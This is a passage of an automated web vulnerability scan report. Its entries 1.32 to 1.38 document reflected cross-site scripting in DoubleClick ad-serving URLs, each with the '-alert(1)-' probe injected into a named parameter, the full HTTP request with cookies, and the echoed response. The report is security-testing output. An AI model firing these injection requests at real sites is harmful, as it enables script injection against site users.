Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABQLokAAAAAAHfeIgAAAAAAAgDkAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAACjtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAHA7a06tPwAAAAAAAAAAAABwO2tOrT8AAAAAAAAAAAAAcDtrTq0.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhX3HBZx9SCugUSM-8gJayF7mxNMV2nhvMny8sAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D797276981%26r%3D0%26s%3D1887835,7a29036c-a12d-11e0-b9a2-5b0ca87794d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6070
Date: Tue, 28 Jun 2011 02:25:02 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
7%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&d96da"-alert(1)-"f7095fb1d0a=1http://www.geico.com/landingpage/go140.htm?soa=59798");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindo
...[SNIP]...

1.32. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.8

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efeba"-alert(1)-"38c0b17c448 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.8;sz=300x250;ord=431024565209792489;click=http://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=efeba"-alert(1)-"38c0b17c448 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABQLokAAAAAAHfeIgAAAAAAAgDkAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAACjtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAHA7a06tPwAAAAAAAAAAAABwO2tOrT8AAAAAAAAAAAAAcDtrTq0.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhX3HBZx9SCugUSM-8gJayF7mxNMV2nhvMny8sAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D797276981%26r%3D0%26s%3D1887835,7a29036c-a12d-11e0-b9a2-5b0ca87794d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:24:39 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
87%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=efeba"-alert(1)-"38c0b17c448http://www.geico.com/landingpage/go140.htm?soa=59798");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindow
...[SNIP]...

1.33. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bba38"-alert(1)-"78ca1578dde was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.8;sz=300x250;ord=431024565209792489;click=http://pixel.mathtag.com/click/img?mt_aid=431024565209792489bba38"-alert(1)-"78ca1578dde&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABQLokAAAAAAHfeIgAAAAAAAgDkAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAACjtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAHA7a06tPwAAAAAAAAAAAABwO2tOrT8AAAAAAAAAAAAAcDtrTq0.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhX3HBZx9SCugUSM-8gJayF7mxNMV2nhvMny8sAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D797276981%26r%3D0%26s%3D1887835,7a29036c-a12d-11e0-b9a2-5b0ca87794d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:23:04 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/s%3B239209737%3B0-0%3B0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489bba38"-alert(1)-"78ca1578dde&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmod
...[SNIP]...

1.34. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be866'-alert(1)-'87c7a423e2e was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950be866'-alert(1)-'87c7a423e2e&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4593
Date: Tue, 28 Jun 2011 03:10:18 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
pe_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950be866'-alert(1)-'87c7a423e2e&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6994%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';

...[SNIP]...

1.35. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3760b'-alert(1)-'d2e50412e43 was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=172864053760b'-alert(1)-'d2e50412e43&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4614
Date: Tue, 28 Jun 2011 03:11:29 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
dth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=172864053760b'-alert(1)-'d2e50412e43&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7003%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';
var target = '_blank';
var dcbgco
...[SNIP]...

1.36. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fb80'-alert(1)-'3f118c0b305 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=173301083fb80'-alert(1)-'3f118c0b305&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4623
Date: Tue, 28 Jun 2011 03:11:06 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=173301083fb80'-alert(1)-'3f118c0b305&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6990%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';
var target = '_blank'
...[SNIP]...

1.37. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d52cb'-alert(1)-'412f1479ff2 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956d52cb'-alert(1)-'412f1479ff2&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4602
Date: Tue, 28 Jun 2011 03:09:31 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
n.net/3126678/SLIM_Wipe_Maria_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956d52cb'-alert(1)-'412f1479ff2&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6972%26avppid%3D653%26avpcid%3D3736%26
...[SNIP]...

1.38. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_et parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db96c'-alert(1)-'befe711ab0a was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488db96c'-alert(1)-'befe711ab0a&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
